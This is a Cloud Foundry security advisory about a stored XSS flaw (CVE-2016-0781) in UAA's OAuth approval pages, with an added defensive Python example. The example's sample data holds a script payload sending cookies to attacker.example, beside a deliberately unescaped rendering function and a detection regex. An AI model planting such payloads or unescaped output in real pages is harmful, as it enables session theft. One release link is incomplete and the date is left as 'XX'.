[SECURITY][LOW] CVE-2016-0781 UAA Persistent XSS Vulnerability

Chip Childers <cchilders@...>

CVE-2016-0781 UAA Persistent XSS Vulnerability

Severity

Low

Vendor

Cloud Foundry Foundation

Versions Affected

Cloud Foundry v208 through v231

Login-server v1.6 - v1.14

UAA v2.0.0 - v2.7.4.1 & v3.0.0 - v3.2.0

UAA-Release v2 - v7

The UAA OAuth approval pages are vulnerable to a persistent (stored) XSS
attack. Anyone able to set the name or description of a SCIM group can store
malicious JavaScript in either the OAuth scope name (the SCIM group name) or
the SCIM group description; the approval page renders that content without
escaping it, so the script runs in the browser of any user who is shown the
approval page for those scopes.
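The following is an added example, not code from the advisory or from UAA itself. It shows the bug class in miniature (a scope row interpolated into HTML unescaped, beside an escaped version) and an audit routine an operator could run over a SCIM GET /Groups response to find group names or descriptions that already carry markup. The response shape and the group entries are constructed for the example; the "displayName" and "description" field names follow UAA's SCIM group representation, and the rendering functions are illustrative, not UAA's actual templates.

```python
import html
import json
import re
from typing import Dict, List

# Constructed sample in the shape of a UAA SCIM GET /Groups response.
# "displayName" is the scope name, "description" is free text. The third
# entry carries an injected payload; none of this is from a real deployment.
SAMPLE_GROUPS_RESPONSE = json.dumps({
    "resources": [
        {"id": "1", "displayName": "openid",
         "description": "Access your profile"},
        {"id": "2", "displayName": "cloud_controller.read",
         "description": "View apps and orgs"},
        {"id": "3", "displayName": "billing.read",
         "description": "View invoices<script>document.location="
                        "'http://attacker.example/?c='+document.cookie</script>"},
    ]
})


def render_approval_row_vulnerable(scope: str, description: str) -> str:
    # Illustrative vulnerable rendering: attacker-controlled group data is
    # interpolated straight into HTML. This is the bug class the advisory
    # describes, not UAA's real template code.
    return (f"<li><input type='checkbox' name='scope.{scope}'> "
            f"{scope}: {description}</li>")


def render_approval_row_fixed(scope: str, description: str) -> str:
    # Hardened rendering: every untrusted value is HTML-escaped before it
    # reaches the page, in both the attribute and the text context.
    # html.escape quotes ' and " by default, which matters inside the attribute.
    return (f"<li><input type='checkbox' name='scope.{html.escape(scope)}'> "
            f"{html.escape(scope)}: {html.escape(description)}</li>")


# Markup or script-ish content that has no business in a scope name or
# description: an opening/closing tag, a javascript: URL, or an on*= handler.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|javascript\s*:|\bon[a-z]+\s*=",
                       re.IGNORECASE)


def find_suspicious_groups(groups_json: str) -> List[Dict[str, str]]:
    """Return one finding per group field whose value contains markup.

    groups_json is the raw body of a SCIM /Groups response.
    """
    findings = []
    for group in json.loads(groups_json).get("resources", []):
        for field in ("displayName", "description"):
            value = group.get(field) or ""
            if MARKUP_RE.search(value):
                findings.append({"id": group.get("id", ""),
                                 "field": field, "value": value})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_groups(SAMPLE_GROUPS_RESPONSE):
        print(f"group {finding['id']}: suspicious {finding['field']}: "
              f"{finding['value']!r}")
    payload = "x<script>alert(1)</script>"
    print("vulnerable:", render_approval_row_vulnerable("billing.read", payload))
    print("fixed:     ", render_approval_row_fixed("billing.read", payload))
```

On an affected version, the audit is a stopgap for finding already-injected content before the upgrade lands, not a substitute for it; the real fix is output encoding in the approval page, which the patched releases provide.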

OSS users are strongly encouraged to follow one of the mitigations below:


Upgrade to Cloud Foundry v233 [1] or later

For standalone UAA users:

For users running UAA v3.x, please upgrade to UAA v3.2.1 [3] or later

For users running standalone UAA v2.x, please upgrade to UAA v2.7.4.2 [2]
or v3.2.1 [3]

For users running standalone login-server 1.x, please upgrade to UAA
v2.7.4.2 [2] or v3.2.1 [3]

For users of UAA-Release (the UAA BOSH release), please upgrade to
UAA-Release v8 [4]


Discovered by the GE Digital Security Team

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v233

[2] https://github.com/cloudfoundry/uaa/releases/tag/

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.2.1

[4] https://github.com/cloudfoundry/uaa-release/releases/tag/v8


2016-Mar-XX: Initial vulnerability report published

Join cf-dev@lists.cloudfoundry.org to automatically receive all group messages.